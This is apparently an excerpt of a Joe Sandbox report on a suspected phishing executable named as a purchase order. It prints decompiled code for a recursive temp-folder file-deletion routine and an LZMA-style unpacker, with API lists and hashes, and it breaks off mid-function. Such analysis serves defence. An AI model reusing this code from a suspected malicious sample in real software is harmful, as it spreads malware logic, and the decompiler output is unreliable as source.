                                                                                                                          control_flow_graph 279 405620-40563b call 4058cf 282 405654-40565e 279->282 283 40563d-40564f DeleteFileA 279->283 285 405660-405662 282->285 286 405672-405680 call 405cfb 282->286 284 4057e8-4057eb 283->284 287 405793-405799 285->287 288 405668-40566c 285->288 294 405682-40568d lstrcatA 286->294 295 40568f-405690 call 405835 286->295 287->284 290 40579b-40579e 287->290 288->286 288->287 292 4057a0-4057a6 290->292 293 4057a8-4057b0 call 405ff6 290->293 292->284 293->284 303 4057b2-4057c7 call 4057ee call 4059b3 RemoveDirectoryA 293->303 297 405695-405698 294->297 295->297 300 4056a3-4056a9 lstrcatA 297->300 301 40569a-4056a1 297->301 302 4056ae-4056cc lstrlenA FindFirstFileA 300->302 301->300 301->302 304 4056d2-4056e9 call 405819 302->304 305 405789-40578d 302->305 318 4057e0-4057e3 call 404fe7 303->318 319 4057c9-4057cd 303->319 312 4056f4-4056f7 304->312 313 4056eb-4056ef 304->313 305->287 307 40578f 305->307 307->287 316 4056f9-4056fe 312->316 317 40570a-405718 call 405cfb 312->317 313->312 315 4056f1 313->315 315->312 321 405700-405702 316->321 322 405768-40577a FindNextFileA 316->322 329 40571a-405722 317->329 330 40572f-40573e call 4059b3 DeleteFileA 317->330 318->284 319->292 324 4057cf-4057de call 404fe7 call 405a49 319->324 321->317 325 405704-405708 321->325 322->304 327 405780-405783 FindClose 322->327 324->284 325->317 325->322 327->305 329->322 334 405724-40572d call 405620 329->334 339 405760-405763 call 404fe7 330->339 340 405740-405744 330->340 334->322 339->322 341 405746-405756 call 404fe7 call 405a49 340->341 342 405758-40575e 340->342 341->322 342->322
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00405620(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004058CF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x424008 =  *0x424008 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405CFB(0x421588, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405835(_t72);
					} else {
						lstrcatA(0x421588, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
						_t37 = FindFirstFileA(0x421588,  &_v332); // executed
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405819( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405CFB(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004059B3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404FE7(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x424008 =  *0x424008 + 1;
										} else {
											E00404FE7(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405A49(__eflags);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405620(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4); // executed
						goto L29;
					}
					__eflags =  *0x421588 - 0x5c;
					if( *0x421588 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405FF6(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004057EE(_t72);
							E004059B3(_t72);
							_t37 = RemoveDirectoryA(_t72); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404FE7(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404FE7(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405A49(__eflags);
						}
						L33:
						 *0x424008 =  *0x424008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                                          0x0040562b
                                                                                                                          0x0040562f
                                                                                                                          0x00405638
                                                                                                                          0x0040563b
                                                                                                                          0x0040563e
                                                                                                                          0x00405646
                                                                                                                          0x00405648
                                                                                                                          0x00405649
                                                                                                                          0x00000000
                                                                                                                          0x00405649
                                                                                                                          0x00405658
                                                                                                                          0x00405658
                                                                                                                          0x0040565b
                                                                                                                          0x0040565e
                                                                                                                          0x00405672
                                                                                                                          0x00405679
                                                                                                                          0x0040567e
                                                                                                                          0x00405680
                                                                                                                          0x00405690
                                                                                                                          0x00405682
                                                                                                                          0x00405688
                                                                                                                          0x00405688
                                                                                                                          0x00405695
                                                                                                                          0x00405698
                                                                                                                          0x004056a3
                                                                                                                          0x004056a9
                                                                                                                          0x004056ae
                                                                                                                          0x004056be
                                                                                                                          0x004056c0
                                                                                                                          0x004056c6
                                                                                                                          0x004056c9
                                                                                                                          0x004056cc
                                                                                                                          0x00405789
                                                                                                                          0x00405789
                                                                                                                          0x0040578d
                                                                                                                          0x0040578f
                                                                                                                          0x0040578f
                                                                                                                          0x0040578f
                                                                                                                          0x0040578f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004056d2
                                                                                                                          0x004056d2
                                                                                                                          0x004056db
                                                                                                                          0x004056e1
                                                                                                                          0x004056e6
                                                                                                                          0x004056e9
                                                                                                                          0x004056eb
                                                                                                                          0x004056ef
                                                                                                                          0x004056f1
                                                                                                                          0x004056f1
                                                                                                                          0x004056ef
                                                                                                                          0x004056f4
                                                                                                                          0x004056f7
                                                                                                                          0x0040570a
                                                                                                                          0x0040570c
                                                                                                                          0x00405711
                                                                                                                          0x00405718
                                                                                                                          0x00405730
                                                                                                                          0x00405736
                                                                                                                          0x0040573c
                                                                                                                          0x0040573e
                                                                                                                          0x00405763
                                                                                                                          0x00405740
                                                                                                                          0x00405740
                                                                                                                          0x00405744
                                                                                                                          0x00405758
                                                                                                                          0x00405746
                                                                                                                          0x00405749
                                                                                                                          0x0040574e
                                                                                                                          0x00405750
                                                                                                                          0x00405751
                                                                                                                          0x00405751
                                                                                                                          0x00405744
                                                                                                                          0x0040571a
                                                                                                                          0x00405720
                                                                                                                          0x00405722
                                                                                                                          0x00405728
                                                                                                                          0x00405728
                                                                                                                          0x00405722
                                                                                                                          0x00000000
                                                                                                                          0x00405718
                                                                                                                          0x004056f9
                                                                                                                          0x004056fc
                                                                                                                          0x004056fe
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405700
                                                                                                                          0x00405702
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405704
                                                                                                                          0x00405708
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405768
                                                                                                                          0x00405772
                                                                                                                          0x00405778
                                                                                                                          0x00405778
                                                                                                                          0x00405783
                                                                                                                          0x00000000
                                                                                                                          0x00405783
                                                                                                                          0x0040569a
                                                                                                                          0x004056a1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405660
                                                                                                                          0x00405660
                                                                                                                          0x00405662
                                                                                                                          0x00405793
                                                                                                                          0x00405796
                                                                                                                          0x00405799
                                                                                                                          0x004057eb
                                                                                                                          0x004057eb
                                                                                                                          0x004057eb
                                                                                                                          0x0040579b
                                                                                                                          0x0040579e
                                                                                                                          0x004057a9
                                                                                                                          0x004057ae
                                                                                                                          0x004057b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004057b3
                                                                                                                          0x004057b9
                                                                                                                          0x004057bf
                                                                                                                          0x004057c5
                                                                                                                          0x004057c7
                                                                                                                          0x00000000
                                                                                                                          0x004057e3
                                                                                                                          0x004057c9
                                                                                                                          0x004057cd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004057d2
                                                                                                                          0x004057d7
                                                                                                                          0x004057d8
                                                                                                                          0x00000000
                                                                                                                          0x004057d9
                                                                                                                          0x004057a0
                                                                                                                          0x004057a0
                                                                                                                          0x00000000
                                                                                                                          0x004057a0
                                                                                                                          0x00405668
                                                                                                                          0x0040566c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040566c

                                                                                                                          APIs
                                                                                                                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 0040563E
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqB9A4.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsqB9A4.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405688
                                                                                                                          • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsqB9A4.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 004056A9
                                                                                                                          • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsqB9A4.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 004056AF
                                                                                                                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsqB9A4.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsqB9A4.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 004056C0
                                                                                                                          • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405772
                                                                                                                          • FindClose.KERNELBASE(?), ref: 00405783
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: "C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsqB9A4.tmp\*.*$\*.*
                                                                                                                          • API String ID: 2035342205-1572585173
                                                                                                                          • Opcode ID: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                                                                                                          • Instruction ID: d22bf5e118ddec5917fccaaf7686bbc93ae223f9f66f108bf4c644a40ea6f6a4
                                                                                                                          • Opcode Fuzzy Hash: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                                                                                                          • Instruction Fuzzy Hash: 5C510630404B44A6DB217B218C85BBF7AA8DF92319F14817BF945B61D1C73C4982EE6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406333 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 518 406333-406338 519 4063a9-4063c7 518->519 520 40633a-406369 518->520 523 40699f-4069b4 519->523 521 406370-406374 520->521 522 40636b-40636e 520->522 525 406376-40637a 521->525 526 40637c 521->526 524 406380-406383 522->524 527 4069b6-4069cc 523->527 528 4069ce-4069e4 523->528 529 4063a1-4063a4 524->529 530 406385-40638e 524->530 525->524 526->524 531 4069e7-4069ee 527->531 528->531 534 406576-406594 529->534 532 406390 530->532 533 406393-40639f 530->533 535 4069f0-4069f4 531->535 536 406a15-406a21 531->536 532->533 539 406409-406437 533->539 537 406596-4065aa 534->537 538 4065ac-4065be 534->538 540 406ba3-406bad 535->540 541 4069fa-406a12 535->541 543 4061b7-4061c0 536->543 546 4065c1-4065cb 537->546 538->546 544 406453-40646d 539->544 545 406439-406451 539->545 547 406bb9-406bcc 540->547 541->536 552 4061c6 543->552 553 406bce 543->553 548 406470-40647a 544->548 545->548 549 4065cd 546->549 550 40656e-406574 546->550 551 406bd1-406bd5 547->551 559 406480 548->559 560 4063f1-4063f7 548->560 561 406549-40654d 549->561 562 4066de-4066eb 549->562 550->534 558 406512-40651c 550->558 554 406272-406276 552->554 555 4062e2-4062e6 552->555 556 4061cd-4061d1 552->556 557 40630d-40632e 552->557 553->551 569 406b22-406b2c 554->569 570 40627c-406295 554->570 566 406b31-406b3b 555->566 567 4062ec-406300 555->567 556->547 563 4061d7-4061e4 556->563 557->523 571 406b61-406b6b 558->571 572 406522-406544 558->572 580 4063d6-4063ee 559->580 581 406b3d-406b47 559->581 573 4064aa-4064b0 560->573 574 4063fd-406403 560->574 564 406553-40656b 561->564 565 406b55-406b5f 561->565 562->543 563->553 576 4061ea-406230 563->576 564->550 565->547 566->547 577 406303-40630b 567->577 569->547 579 406298-40629c 570->579 571->547 572->562 575 40650e 573->575 578 4064b2-4064d0 573->578 574->539 574->575 575->558 582 406232-406236 576->582 583 406258-40625a 576->583 577->555 577->557 584 4064d2-4064e6 578->584 585 4064e8-4064fa 578->585 579->554 586 40629e-4062a4 579->586 580->560 581->547 587 406241-40624f GlobalAlloc 582->587 588 406238-40623b GlobalFree 582->588 589 406268-406270 583->589 590 40625c-406266 583->590 591 4064fd-406507 584->591 585->591 592 4062a6-4062ad 586->592 593 4062ce-4062e0 586->593 587->553 594 406255 587->594 588->587 589->579 590->589 590->590 591->573 595 406509 591->595 596 4062b8-4062c8 GlobalAlloc 592->596 597 4062af-4062b2 GlobalFree 592->597 593->577 594->583 599 406b49-406b53 595->599 600 40648f-4064a7 595->600 596->553 596->593 597->596 599->547 600->573
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406333() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
